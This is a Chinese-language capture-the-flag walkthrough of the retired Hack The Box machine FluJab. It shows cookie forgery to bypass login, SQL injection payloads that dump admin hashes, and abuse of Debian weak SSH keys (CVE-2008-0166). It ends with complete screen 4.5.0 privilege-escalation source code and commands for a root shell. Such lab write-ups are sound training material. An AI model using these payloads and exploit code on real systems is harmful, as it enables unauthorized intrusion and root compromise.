本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.124
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.124 -o ./FluJab-autorecon
根据扫描结果,含有大量域名,这里提前先绑定好hosts信息
10.10.10.124 clownware.htb proxy.clownware.htb console.flujab.htb sys.flujab.htb smtp.flujab.htb vaccine4flu.htb bestmedsupply.htb custoomercare.megabank.htb flowerzrus.htb chocolateriver.htb meetspinz.htb rubberlove.htb freeflujab.htb flujab.htb
域名比较多,需要访问多个域名进行测试发现,这里使用工具aquatone进行批量探索,具体链接地址:https://github.com/michenriksen/aquatone/releases 经过不断的测试最终发现域名https://freeflujab.htb是可利用的,本靶机存在waf防护,直接访问IP地址会显示被拦截
点击上了上面的每个功能页面,通过burpsuite抓包
总结模块信息
Patient=74f85ae35abd655f80b6a74ff5d172ec Registered=NzRmODVhZTM1YWJkNjU1ZjgwYjZhNzRmZjVkMTcyZWM9TnVsbA%3D%3D Modus=Q29uZmlndXJlPU51bGw%3D path=/?smtp_config
上面信息大概意思是发送登录请求服务的会响应设置cookie信息,并告知请求的路径/?smtp_config ,其中模块Modus和Registered的属性值是经过base64编码,且最后的等于号(=)进行了url编码,所以我们将其整体的解码一边看看
从上面可以发现未登录之前cookie带的信息值是Null,访问?logout 的时候cookie值同样显示跟上面类似的信息,所以经过测试发现可以通过更改cookie属性值将其从Null更改为True即可绕过登录访问被限制的页面,下面是最终需要更改为True的编码值
Q29uZmlndXJlPU51bGw%3D Configure=Null Configure=Ture Q29uZmlndXJlPVRydWU%3D ------------------------- NzRmODVhZTM1YWJkNjU1ZjgwYjZhNzRmZjVkMTcyZWM9TnVsbA%3D%3D 74f85ae35abd655f80b6a74ff5d172ec=Null NzRmODVhZTM1YWJkNjU1ZjgwYjZhNzRmZjVkMTcyZWM9VHJ1ZQ%3D%3D 74f85ae35abd655f80b6a74ff5d172ec=True -------------------------------------
下面是配置burpsuite使其自动的替换Cookie属性值 ^Cookie.*$ 替换为 Cookie: Modus=Q29uZmlndXJlPVRydWU%3D; Patient=74f85ae35abd655f80b6a74ff5d172ec; Registered=NzRmODVhZTM1YWJkNjU1ZjgwYjZhNzRmZjVkMTcyZWM9VHJ1ZQ%3D%3D
上述配置完成,开始访问/?smtp_config,这里刚开始准备在输入框写入IP地址,但是不被允许,然后尝试使用burpsuite拦截数据包再填写即可成功
上述是配置修改为IP地址,完成之后重新刷新页面再次请求/?smtp_config
到了此步说明已经将目标靶机连接到本地kali搭建的邮件服务器,这里使用python搭建简单的邮件服务,具体如下:
一条命令搭建
python -m smtpd -n -c DebuggingServer :25
一段代码搭建
import asyncore from smtpd import SMTPServer class EmlServer(SMTPServer): no = 0 def process_message(self, peer, mailfrom, rcpttos, data): print data self.no += 1 def run(): foo = EmlServer(('10.10.14.6', 25), None) try: asyncore.loop() except KeyboardInterrupt: pass if __name__ == '__main__': run()
得到上面页面有显示一个白名单页面的链接:whitelisted sysadmins 点击一下即可添加当前kali的IP地址为白名单
准备好上面的之后尝试访问/?remind开启burpsuite进行拦截并修改请求数据包,添加发送的邮件信息
添加邮件信息
成功收到邮件信息
测试发现,此处存在sql注入漏洞,具体如下
手动注入语句
or 1=1-- -
or 1=2-- -
UNION SELECT 1,2,3,4,5 -- -
UNION SELECT 1,2,concat(loginname,':',password,':',access),4,5 FROM admin -- -
最终注入出来账户和密码以及登录的新域名地址
密码hash sysadm:a3e30cce47580888f1f185798aca22ff10be617f4a982d67643bb56448508602:sysadmin-console-01.flujab.htb 解密出来密码是:th3doct0r
绑定hosts信息
10.10.10.124 sysadmin-console-01.flujab.htb
访问此域名地址并使用账户和密码登录到了此步后面就比较简单了,登录进去之后有个notepad功能,可以通过此功能进行查看目标靶机的文件内容,这里查看了目标靶机的/etc/passwd,和每个用户家目录的信息,最后发现用户drno存在公钥,内容如下
# shell whitelisting + key auth enabled ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAgEAqTfCP9e71pkBY+uwbr+IIx1G1r2G1mcjU5GsA42OZCWOKhWg2VNg0aAL+OZLD2YbU/di+cMEvdGZNRxCxaBNtGfMZTTZwjMNKAB7sJFofSwM29SHhuioeEbGU+ul+QZAGlk1x5Ssv+kvJ5/S9vUESXcD4z0jp21CxvKpCGI5K8YfcQybF9/v+k/KkpDJndEkyV7ka/r/IQP4VoCMQnDpCUwRCNoRb/kwqOMz8ViBEsg7odof7jjdOlbBz/F9c/s4nbS69v1xCh/9muUwxCYtOxUlCwaEqm4REf4nN330Gf4I6AJ/yNo2AH3IDpuWuoqtE3a8+zz4wcLmeciKAOyzyoLlXKndXd4Xz4c9aIJ/15kUyOvf058P6NeC2ghtZzVirJbSARvp6reObXYs+0JMdMT71GbIwsjsKddDNP7YS6XG+m6Djz1Xj77QVZbYD8u33fMmL579PRWFXipbjl7sb7NG8ijmnbfeg5H7xGZHM2PrsXt04zpSdsbgPSbNEslB78RC7RCK7s4JtroHlK9WsfH0pdgtPdMUJ+xzv+rL6yKFZSUsYcR0Bot/Ma1k3izKDDTh2mVLehsivWBVI3a/Yv8C1UaI3lunRsh9rXFnOx1rtZ73uCMGTBAComvQY9Mpi96riZm2QBe26v1MxIqNkTU03cbNE8tDD96TxonMAxE=
看了下目标靶机的系统版本是debian又看到其他用户的目录公钥信息及提示,确认存在漏洞 https://www.cvedetails.com/cve/CVE-2008-0166 可以通过https://github.com/g0tmi1k/debian-ssh/tree/master/uncommon_keys下的私钥进行比对获取对应的私钥登录目标
通过取出公钥最后一段字符进行比对得到如下
将其复制到本地给其权限600然后登录目标,显示如下
上述显示保存,可判断为目标靶机使用了TCP Wrapper 进行安全限制,可以通过在 /etc/hosts.allow添加自己的IP地址进行绕过登录,我在这里测试的时候卡了一段实际,手动通过页面添加显示成功,但死活连接不上,后来通过api的形式添加成功才可以登录,相关api文档,可以参考:http://docs1.ajenti.org/en/latest/index.html http://docs.ajenti.org/en/latest/refjs/filesystem.html
下面是/etc/hosts.deny的白名单配置
最终连接成功,获取user.txt
此处还有另外一种方式登录目标靶机,因为在查看目标靶机存在哪些用户的时候,刚好也发现存在用户sysadm,这用户也刚好是登录靶机的web应用的账户,而且查看/etc/ssh/sshd_config配置的发现配置文件里面配置了登录目标靶机的公钥配置了别名,具体如下:
AuthorizedKeysFile .ssh/authorized_keys access
所以我们可以通过本地生成私钥和公钥,然后通过上述的web应用-sysadmin将生成的公钥写入到名称为access的文件里面,位置就在用户sysadm的家目录下面即可,这里通过api的形式添加最稳定靠谱,具体的api操作演示就不做了,我们看看结果
ssh-keygen -t rsa -f bmfx -N bmfx -f 指定密钥文件名 -t 指定密钥类型 -N 指定生成此密钥的密码
登录进去发现是个受限制的rbash,这个前面靶机有演示过
开始提权,查找suid文件
发现两个screen,确认这两个screen的版本,发现其中一个存提权漏洞,参考:https://www.exploit-db.com/exploits/41154 此漏洞提权前面靶机也演示过,正常情况下丢到目标靶机直接执行脚本即可提权,但是测试发现目标靶机并没有gcc环境,所以需要自己在本地kali中编译好环境然后传到目标靶机进行提权即可
第一步 cat << EOF > libhax.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF 第二步 gcc -fPIC -shared -ldl -o libhax.so libhax.c 第三步 cat << EOF > rootshell.c #include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF 第四步 gcc -o rootshell rootshell.c 第五步 cd /etc umask 000 /usr/local/share/screen/screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" 第六步 执行提权文件rootshell